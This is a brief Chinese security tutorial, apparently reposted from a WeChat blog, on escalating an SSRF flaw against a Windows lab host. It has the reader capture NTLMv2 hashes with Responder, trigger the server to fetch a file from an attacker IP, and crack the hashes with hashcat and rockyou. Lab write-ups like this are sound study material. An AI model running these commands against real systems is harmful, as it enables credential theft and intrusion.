01—SSRF的利用姿势
SSRF这个常见的服务端请求伪造攻击在挖SRC的时候常常会见到,但是一般都是低危或者中危,如何扩大战果?下面演示一下如何通过SSRF突破边界:
实验靶机:windows主机+含有ssrf的web站点
当我们可以通过ssrf来读取我们远程服务器上面的文件时:
我们可以通过responder这个工具来抓取http的流量,截获windows上面的ntlmV2的hash,这样在通过爆破获取windows主机的密码:
responder
-I tap0 -wv
#tap0指网卡
网页上访问:
http://192.168.x.x:8080/?url=http://192.168.x.x:80/reverse_shell.py
成功拿到hash,拿去爆破:
hashcat -m 5600
hash
/usr/share/wordlists/rockyou.txt --force
这样就可以拿到账户和密码突破边界!
原文始发于微信公众号(道玄网安驿站):SSRF如何突破边界?
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论